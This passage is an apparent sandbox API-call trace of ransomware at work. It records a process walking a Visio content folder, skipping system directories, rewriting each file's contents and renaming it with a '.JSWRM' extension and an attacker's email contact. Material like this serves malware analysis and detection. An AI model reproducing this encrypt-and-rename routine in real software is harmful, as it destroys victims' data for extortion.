lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCHEN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCHEN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.117] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20607) returned 1 [0147.117] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.117] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5070, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5070, lpOverlapped=0x0) returned 1 [0147.134] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.134] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5070, lpOverlapped=0x0) returned 1 [0147.135] CloseHandle (hObject=0x314) returned 1 [0147.135] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.136] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x51f3, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBCHEN_M.VSTX", cAlternateFileName="DBCHEN~2.VST")) returned 1 [0147.136] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2=".") returned 1 [0147.136] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="..") returned 1 [0147.136] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="...") returned 1 [0147.136] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="windows") returned -1 [0147.136] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="recovery") returned -1 [0147.136] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="perflogs") returned -1 [0147.137] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="documents and settings") returned -1 [0147.137] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.137] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="system volume information") returned -1 [0147.137] lstrcmpiW (lpString1="DBCHEN_M.VSTX", lpString2="msocache") returned -1 [0147.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCHEN_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCHEN_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.138] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20979) returned 1 [0147.138] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.138] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x51f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x51f0, lpOverlapped=0x0) returned 1 [0147.145] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.145] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x51f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x51f0, lpOverlapped=0x0) returned 1 [0147.145] CloseHandle (hObject=0x314) returned 1 [0147.145] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.147] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x33eb904, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x33eb904, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x33eb904, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4d55, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBCHEN_U.VSSX", cAlternateFileName="DBCHEN~1.VSS")) returned 1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2=".") returned 1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="..") returned 1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="...") returned 1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="windows") returned -1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="recovery") returned -1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="perflogs") returned -1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="documents and settings") returned -1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="system volume information") returned -1 [0147.147] lstrcmpiW (lpString1="DBCHEN_U.VSSX", lpString2="msocache") returned -1 [0147.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCHEN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCHEN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.148] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19797) returned 1 [0147.148] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.148] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4d50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4d50, lpOverlapped=0x0) returned 1 [0147.151] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.151] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4d50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4d50, lpOverlapped=0x0) returned 1 [0147.151] CloseHandle (hObject=0x314) returned 1 [0147.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.152] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5078, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBCHEN_U.VSTX", cAlternateFileName="DBCHEN~1.VST")) returned 1 [0147.152] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2=".") returned 1 [0147.152] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="..") returned 1 [0147.152] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="...") returned 1 [0147.152] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="windows") returned -1 [0147.152] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="recovery") returned -1 [0147.152] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="perflogs") returned -1 [0147.153] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="documents and settings") returned -1 [0147.153] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.153] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="system volume information") returned -1 [0147.153] lstrcmpiW (lpString1="DBCHEN_U.VSTX", lpString2="msocache") returned -1 [0147.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCHEN_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCHEN_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.154] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20600) returned 1 [0147.154] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.154] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5070, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5070, lpOverlapped=0x0) returned 1 [0147.156] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.156] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5070, lpOverlapped=0x0) returned 1 [0147.157] CloseHandle (hObject=0x314) returned 1 [0147.157] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCHEN_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbchen_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.158] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3c43bbb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3c43bbb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3c43bbb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6b48, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBCROW_M.VSSX", cAlternateFileName="DBCROW~2.VSS")) returned 1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2=".") returned 1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="..") returned 1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="...") returned 1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="windows") returned -1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="recovery") returned -1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="perflogs") returned -1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="documents and settings") returned -1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="system volume information") returned -1 [0147.158] lstrcmpiW (lpString1="DBCROW_M.VSSX", lpString2="msocache") returned -1 [0147.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCROW_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCROW_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.159] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=27464) returned 1 [0147.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.159] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6b40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6b40, lpOverlapped=0x0) returned 1 [0147.162] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.162] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6b40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6b40, lpOverlapped=0x0) returned 1 [0147.162] CloseHandle (hObject=0x314) returned 1 [0147.162] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.164] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x595a, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBCROW_M.VSTX", cAlternateFileName="DBCROW~2.VST")) returned 1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2=".") returned 1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="..") returned 1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="...") returned 1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="windows") returned -1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="recovery") returned -1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="perflogs") returned -1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="documents and settings") returned -1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="system volume information") returned -1 [0147.164] lstrcmpiW (lpString1="DBCROW_M.VSTX", lpString2="msocache") returned -1 [0147.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCROW_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCROW_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.164] WideCharToMultiByte (in: CodePage=0xfde9, 